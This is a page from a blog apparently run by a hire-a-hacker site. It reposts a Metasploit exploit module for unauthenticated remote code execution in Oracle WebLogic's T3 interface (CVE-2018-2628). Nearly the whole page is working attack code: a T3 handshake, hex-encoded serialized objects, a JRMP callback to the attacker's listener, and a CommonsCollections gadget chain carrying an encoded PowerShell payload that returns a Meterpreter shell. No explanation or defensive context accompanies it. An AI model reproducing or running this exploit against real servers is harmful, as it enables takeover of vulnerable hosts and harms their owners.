Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86379009

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::Powershell

  def initialize(info={})
    super(update_info(info,
      'Name' => 'Oracle Weblogic Server Deserialization RCE',
      'Description' => %q{
        An unauthenticated attacker with network access to the Oracle Weblogic
        Server T3 interface can send a serialized object to the interface to
        execute code on vulnerable hosts.
      },
      'Author' =>
        [
        'brianwrf',     # EDB PoC
        'Jacob Robles'  # Metasploit Module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2018-2628'],
          ['EDB', '44553']
        ],
      'Privileged' => false,
      'Targets' =>
        [
          [ 'Windows',
            {
              'Platform' => ['win']
            }
          ]
        ],
      'DefaultTarget' => 0,
      'DefaultOptions' =>
        {
          'RPORT' => 7001
        },
      'DisclosureDate' => 'Apr 17 2018'))
  end

  def gen_resp
    pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
    pwrshl.gsub!("%COMSPEC%", "cmd.exe")
    tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join

    mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0')
    mycmd << tmp_dat

    # Response data taken from JRMPListener generated data:
    # java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 'calc.exe'
    # Modified captured network traffic bytes. Patch in command to run
    @resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e'
    @resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045'
    @resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176'
    @resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863'
    @resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e'
    @resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c'
    @resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573'
    @resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163'
    @resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545'
    @resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400'
    @resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c'
    @resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c'
    @resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163'
    @resp << '6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e'
    @resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669'
    @resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870'
    @resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973'
    @resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361'
    @resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361'
    @resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e'
    @resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e'
    @resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973'
    @resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176'
    @resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543'
    @resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661'
    @resp << '2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469'
    @resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870'
    @resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374'
    @resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e'
    @resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565'
    @resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61'
    @resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574'
    @resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176'
    @resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c'
    @resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174'
    @resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163'
    @resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d'
    @resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61'
    @resp << '70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366'
    @resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f'
    @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675'
    @resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97'
    @resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061'
    @resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'
    @resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f'
    @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472'
    @resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d'
    @resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d'
    @resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461'
    @resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73'
    @resp << '74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672'
    @resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078'
    @resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469'
    @resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287'
    @resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67'
    @resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950'
    @resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400'
    @resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61'
    @resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67'
    @resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab'
    @resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100'
    @resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a'
    @resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270'
    @resp << '7571007e003b00000000740006696e766f6b657571007e003e00000002767200'
    @resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076'
    @resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e'
    @resp << '673badd256e7e91d7b470200007078700000000174'

    @resp << mycmd

    @resp << '74'
    @resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a'
    @resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661'
    @resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'
    @resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005'
    @resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368'
    @resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61'
    @resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100'
    @resp << '7e005a'
  end


  def on_client_connect(client)
    # Make sure to only sent one meterpreter payload to a host.
    # During testing the remote host called back up to 11 times
    # (or as long as the server was listening).
    vprint_status("Comparing host: #{client.peerhost}")
    if @met_sent.include?(client.peerhost) then return end
    @met_sent << client.peerhost

    vprint_status("met_sent: #{@met_sent}")

    # Response format determined by watching network traffic
    # generated by EDB PoC
    accept_conn = '4e00'
    raccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join
    accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0')
    accept_conn << raccept_conn
    accept_conn << '0000'
    accept_conn << client.peerport.to_s(16).rjust(4,'0')

    client.put([accept_conn].pack('H*'))
    client.put([@resp].pack('H*'))
  end

  def t3_handshake
    shake = '74332031322e322e310a41533a323535'
    shake << '0a484c3a31390a4d533a313030303030'
    shake << '30300a0a'

    sock.put([shake].pack('H*'))
    sleep(1)
    sock.get_once
  end

  def build_t3_request_object
    # data block is from EDB PoC
    data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'
    data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'
    data << '700000000a000000030000000000000006007070707070700000000a00000003'
    data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'
    data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'
    data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'
    data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'
    data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'
    data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'
    data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'
    data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'
    data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'
    data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'
    data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'
    data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'
    data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'
    data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'
    data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'
    data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'
    data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'
    data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
    data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'
    data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'
    data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'
    data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'
    data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'
    data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'
    data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
    data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'
    data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'
    data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'
    data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'
    data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'
    data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'
    data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'
    data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'
    data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'
    data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'
    data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'
    data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'
    data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'
    data << '2d4147444d565155423154362e656883348cd6000000070000'

    data << rport.to_s(16).rjust(4, '0')

    data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'
    data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'
    data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'
    data << '863d1d0000000078'

    sock.put([data].pack('H*'))
    sleep(2)
    sock.get_once
  end

  def send_payload_objdata
    # JRMPClient2 payload generated from EDB PoC:
    # python exploit.py <rhost> <rport> ysoserial-0.0.6-SNAPSHOT-BETA-all.jar <lhost> <lport> JRMPClient2
    # Patch in srvhost and srvport
    payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
    payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
    payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'
    payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'
    payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'
    payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'
    payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'
    payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'
    payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'
    payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'
    payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'
    payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'
    payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'
    payload << '78707702000078fe010000'

    # Data
    payload << 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e'
    payload << '416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50'
    payload << '726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e67'
    payload << '2f7265666c6563742f496e766f636174696f6e48616e646c65723b7870737200'
    payload << '2d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e76'
    payload << '6f636174696f6e48616e646c657200000000000000020200007872001c6a6176'
    payload << '612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c6133'
    payload << '1e030000787077'

    unicast_srvhost = srvhost.each_byte.map { |b| b.to_s(16) }.join
    unicast_dat = '000a556e696361737452656600'
    unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2,'0')
    unicast_dat << unicast_srvhost
    unicast_dat << '0000'
    unicast_dat << srvport.to_s(16).rjust(4,'0')
    unicast_dat << '000000004e18654b000000000000000000000000000000'
    unicast_dat << '78'

    payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0')
    payload << unicast_dat

    payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'
    payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'
    payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'
    payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'
    payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'
    payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'
    payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'
    payload << '6f3b290000001b7878fe00ff'

    data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
    data << payload

    sock.put([data].pack('H*'))
    sleep(1)
    sock.put([data].pack('H*'))
    sleep(1)
    sock.get_once
  end

  def exploit
    @met_sent = []
    gen_resp

    connect
    vprint_status('Sending handshake...')
    t3_handshake

    build_t3_request_object

    start_service

    vprint_status('Sending payload...')
    send_payload_objdata

    # Need to wait this long to make sure we get a shell back
    sleep(10)
  end
end